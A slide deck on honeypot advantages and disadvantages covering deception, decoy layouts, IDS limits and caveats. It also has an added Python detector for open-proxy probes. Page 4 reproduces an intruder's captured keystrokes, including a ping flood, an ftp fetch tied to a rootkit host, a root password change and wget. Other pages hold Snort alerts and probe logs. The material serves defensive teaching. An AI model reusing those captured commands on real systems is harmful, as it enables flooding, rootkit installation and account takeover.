Honeypot Best Practices
Honeypot Advantages & Disadvantages
George Bakos - [email protected]
Jay Beale - [email protected]

Feb 01, 2018

Page 1

Honeypot Advantages & Disadvantages

George Bakos - [email protected]
Jay Beale - [email protected]

Page 2

Honeypot Advantages & Disadvantages

● Intelligence Gathering
● Perception Management
● Engineering Deception
● Isn't an Intrusion Detection System enough?
● Limits, caveats and legal & ethical concerns

Page 3

Intelligence Gathering

"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat."

-- Sun Tzu, The Art of War

Page 4

Intelligence Gathering

Keystrokes captured on a honeypot:

# cd /;ls -alF;w;uname -a;id
# ftp ftp.0catch.com
# ls
# ftp
# open
# ftp.0catch.com
# ping -f -s 65000 64.58.174.8&
# ps ax !
# rootkit.0catch.com
# szopol
# ls
# passwd root
# wget

Page 5

Perception Management

"Battlefield deception consists of those operations conducted at echelons theater (Army component) and below which purposely mislead enemy decision makers by:
* Distortion.
* Concealment.
* Falsification of indicators of friendly intentions, capabilities, or dispositions."

-- US Army FM 90-2

Page 6

Perception Management

● False banners
● False TCP/IP stacks
● Decoy systems
● Honeynets

Page 7

Perception Management - False Banners -

Page 8

Perception Management - False Banners -

Page 9

Perception Management - False TCP/IP Stacks -

# wwww:ttt:mmm:D:W:S:N:I:OS Description
#
# wwww - window size
# ttt  - time to live
# mmm  - maximum segment size
# D    - don't fragment flag  (0=unset, 1=set)
# W    - window scaling (-1=not present, other=value)
# S    - sackOK flag (0=unset, 1=set)
# N    - nop flag (0=unset, 1=set)
# I    - packet size (-1 = irrelevant)

Page 10

Perception Management - False TCP/IP Stacks -

# wwww:ttt:mmm:D:W:S:N:I:OS Description
5840:128:536:1:0:1:1:48:Windows 95 (3)
16060:64:1460:1:0:1:1:60:Debian/Caldera Linux 2.2.x
8760:255:1380:1:0:0:0:44:Solaris 2.7

Page 11

Perception Management - Decoys, Honeypots, Honeynets -

● Low Interaction
● High Interaction
● Emulators
● Null Listeners
● Virtual Systems
● Physical Systems

Page 12

Engineering Deception

"...he is skillful in defense whose opponent does not know what to attack."

-- Sun Tzu, The Art of War

Page 13

Engineering Deception - Exposed Decoys -

[Diagram: production WWW and SMTP/DNS servers next to a Honeypot WWW and a Honeypot SMTP/DNS; caption "Thanks for the intel!"]

Page 14

Engineering Deception - Interleaved Decoys -

[Diagram: DMZ holding WWW, SMTP/DNS and two Honeypots; internal segment with hosts (Host) interleaved with honeypots (HP); caption "Thanks for the intel!"]

Page 15

Engineering Deception - Lateral Decoys -

[Diagram: WWW and SMTP/DNS servers; hosts (Host) and honeypots (HP) spread across the 10.2.4.0/22 and 10.2.8.0/22 subnets]

Page 16

Engineering Deception

● Production Honeypots
– IDS enhancement / augmentation
– Cloud the battlefield; lay a "Minefield" (Mantrap)
– Insiders / Outsiders

Page 17

Engineering Deception

● Research Honeypots
– 0-day discovery
– Education & awareness
– Trend analysis

● Security Alliances
– ISACs, Honeynet Alliance

Page 18

Isn't Network IDS enough?

[**] [1:618:2] SCAN Squid Proxy attempt [**]
[Classification: Attempted Information Leak] [Priority: 2]
11/04-08:09:27.772993 216.218.184.2:3704 -> 10.2.87.142:3128
TCP TTL:49 TOS:0x0 ID:35607 IpLen:20 DgmLen:44 DF
******S* Seq: 0x13C82726  Ack: 0x0  Win: 0x4000  TcpLen: 24
TCP Options (1) => MSS: 1412

[**] [100:1:1] spp_portscan: PORTSCAN DETECTED from 216.218.184.2 (THRESHOLD 4 connections exceeded in 0 seconds) [**]
11/04-20:19:09.882416

Snort Network Intrusion Detection System alert
http://www.snort.org

Page 19

Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/10-2-87-142 HTTP/1.0
Connection: close
Pragma: no-cache
Accept: text/html
Host: 216.218.184.9
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)
CLIENT-IP: 10.2.87.142
X-FORWARDED-FOR: 10.2.87.142

Tiny Honeypot log

Page 20

Isn't Network IDS enough?

GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/81/10-2-87-142 HTTP/1.0
Connection: close
Pragma: no-cache
Accept: text/html
Host: 216.218.184.9
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)
CLIENT-IP: 10.2.87.142
X-FORWARDED-FOR: 10.2.87.142

Tiny Honeypot log
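The Snort alerts on page 18 only say that 10.2.87.142 was scanned; the two Tiny Honeypot captures above show what the scanner actually did once connected: it asked the supposed proxy to fetch a URL on the scanner's own host that encodes the probed port (3128, then 81) and the honeypot's address. Added here as an example (not from the slides and not Tiny Honeypot's code), Python that classifies such a captured request as an open-proxy probe and pulls out the callback host and probed port; the request text is the slide's capture re-typed as a constructed string, and HONEYPOT_IP is taken from the X-FORWARDED-FOR header.

```python
import re
from typing import Optional, Dict

# Constructed from the captures shown on the slides; the honeypot's own address.
HONEYPOT_IP = "10.2.87.142"
CAPTURE_3128 = (
    "GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/10-2-87-142 HTTP/1.0\r\n"
    "Connection: close\r\nPragma: no-cache\r\nAccept: text/html\r\n"
    "Host: 216.218.184.9\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98)\r\n"
    "CLIENT-IP: 10.2.87.142\r\nX-FORWARDED-FOR: 10.2.87.142\r\n\r\n"
)
CAPTURE_81 = CAPTURE_3128.replace("/3128/", "/81/")

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
ABSOLUTE_URI = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/.*)?$")

def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into its request line and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    m = REQUEST_LINE.match(head[0])
    if not m:
        raise ValueError(f"bad request line: {head[0]!r}")
    req = {"method": m.group("method"), "target": m.group("target")}
    for line in head[1:]:
        name, _, value = line.partition(":")
        req[name.strip().lower()] = value.strip()
    return req

def classify_proxy_probe(raw: str, our_ip: str) -> Optional[Dict[str, str]]:
    """Return probe details when the request asks us to proxy a fetch that encodes our own address."""
    req = parse_request(raw)
    uri = ABSOLUTE_URI.match(req["target"])
    if req["method"] != "GET" or not uri:
        return None            # origin-form request: an ordinary client, not a proxy probe
    ip_token = our_ip.replace(".", "-")          # 10.2.87.142 appears as 10-2-87-142 in the path
    path = uri.group("path") or "/"
    segs = path.strip("/").split("/")
    if ip_token not in segs and req.get("x-forwarded-for") != our_ip:
        return None
    port = next((s for s in segs if s.isdigit()), "?")   # the port the scanner just connected to
    return {"callback_host": uri.group("host"), "probed_port": port, "victim": our_ip}
```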

Page 21

Caveats (There's no free lunch)

● if ($value == "high") { $cost = "high" }
– Deployment costs
– Analysis costs
– Potential for greater risk

Page 22

Caveats (There's no free lunch)

Page 23

Honeypot Advantages & Disadvantages

George Bakos - [email protected]
Jay Beale - [email protected]